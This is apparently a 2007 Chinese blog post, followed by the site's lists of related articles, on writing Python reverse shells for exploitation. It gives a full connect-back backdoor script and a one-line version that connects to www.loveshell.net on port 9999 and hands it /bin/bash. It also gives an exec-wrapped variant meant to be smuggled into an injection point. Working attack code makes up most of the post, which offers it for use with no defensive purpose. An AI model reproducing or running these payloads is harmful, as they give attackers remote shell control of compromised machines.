在漏洞利用Python代码真的很爽


Posted in Python onAugust 26, 2007

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006

import sys
import os
import socket
shell = "/bin/sh"

def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006\n"
  print "Usage: %s <conn_back_host> <port>\n" % programname

def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)

  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------\n")
  s.send("----------------------------- By wofeiwo -----------------------------\n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()

if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是

import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");';

注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

Python 相关文章推荐
python中getaddrinfo()基本用法实例分析
Jun 28 Python
从零开始学Python第八周:详解网络编程基础(socket)
Dec 14 Python
pygame 精灵的行走及二段跳的实现方法(必看篇)
Jul 10 Python
浅谈用VSCode写python的正确姿势
Dec 16 Python
简单的python协同过滤程序实例代码
Jan 31 Python
PyCharm 设置SciView工具窗口的方法
Jan 15 Python
Python3中列表list合并的四种方法
Apr 19 Python
利用python计算windows全盘文件md5值的脚本
Jul 27 Python
Pycharm+django2.2+python3.6+MySQL实现简单的考试报名系统
Sep 05 Python
在Pytorch中计算自己模型的FLOPs方式
Dec 30 Python
使用python matplotlib 画图导入到word中如何保证分辨率
Apr 16 Python
文件上传服务器-jupyter 中python解压及压缩方式
Apr 22 Python
python编程-将Python程序转化为可执行程序[整理]
Apr 09 #Python
python的几种开发工具介绍
Mar 07 #Python
王纯业的Python学习笔记 下载
Feb 10 #Python
一篇不错的Python入门教程
Feb 08 #Python
Python学习资料
Feb 08 #Python
Python完全新手教程
Feb 08 #Python
简明 Python 基础学习教程
Feb 08 #Python
You might like
php curl常见错误:SSL错误、bool(false)
2011/12/28 PHP
解析php中获取系统信息的方法
2013/06/25 PHP
php preg_replace替换实例讲解
2013/11/04 PHP
PHP读取文件内容后清空文件示例代码
2014/03/18 PHP
PHP实现清除wordpress里恶意代码
2015/10/21 PHP
php在windows环境下获得cpu内存实时使用率(推荐)
2018/02/08 PHP
在JS中如何调用JSP中的变量
2014/01/22 Javascript
给js文件传参数(详解)
2014/07/13 Javascript
JS小游戏之宇宙战机源码详解
2014/09/25 Javascript
详解iframe与frame的区别
2016/01/13 Javascript
jQuery实现的简单拖拽功能示例
2016/09/13 Javascript
select下拉框插件jquery.editable-select详解
2017/01/22 Javascript
canvas红包照片实例分享
2017/02/28 Javascript
React Native react-navigation 导航使用详解
2017/12/01 Javascript
vue首次赋值不触发watch的解决方法
2018/09/11 Javascript
vue vue-Router默认hash模式修改为history需要做的修改详解
2018/09/13 Javascript
vue实现中部导航栏布局功能
2019/07/30 Javascript
原生JavaScript实现的无缝滚动功能详解
2020/01/17 Javascript
Python中使用异常处理来判断运行的操作系统平台方法
2015/01/22 Python
利用 Monkey 命令操作屏幕快速滑动
2016/12/07 Python
详解python while 函数及while和for的区别
2018/09/07 Python
Django如何使用redis作为缓存
2020/05/21 Python
canvas 下载二维码和图片加水印的方法
2018/03/21 HTML / CSS
KARATOV珠宝在线商店:俄罗斯珠宝品牌
2019/03/13 全球购物
2014乡镇“三八”国际劳动妇女节活动总结
2014/03/01 职场文书
大学新生军训自我鉴定
2014/03/18 职场文书
综合办公室主任岗位职责
2014/04/13 职场文书
私人委托书格式
2014/09/10 职场文书
人大代表选举标语
2014/10/07 职场文书
因公司原因离职的辞职信范文
2015/05/12 职场文书
骆驼祥子读书笔记
2015/06/26 职场文书
2015年小学教科研工作总结
2015/07/20 职场文书
详解MySQL 用户权限管理
2021/04/20 MySQL
80行代码写一个Webpack插件并发布到npm
2021/05/24 Javascript
Pytorch distributed 多卡并行载入模型操作
2021/06/05 Python
Windows下用Nginx配置https服务器及反向代理的问题
2021/09/25 Servers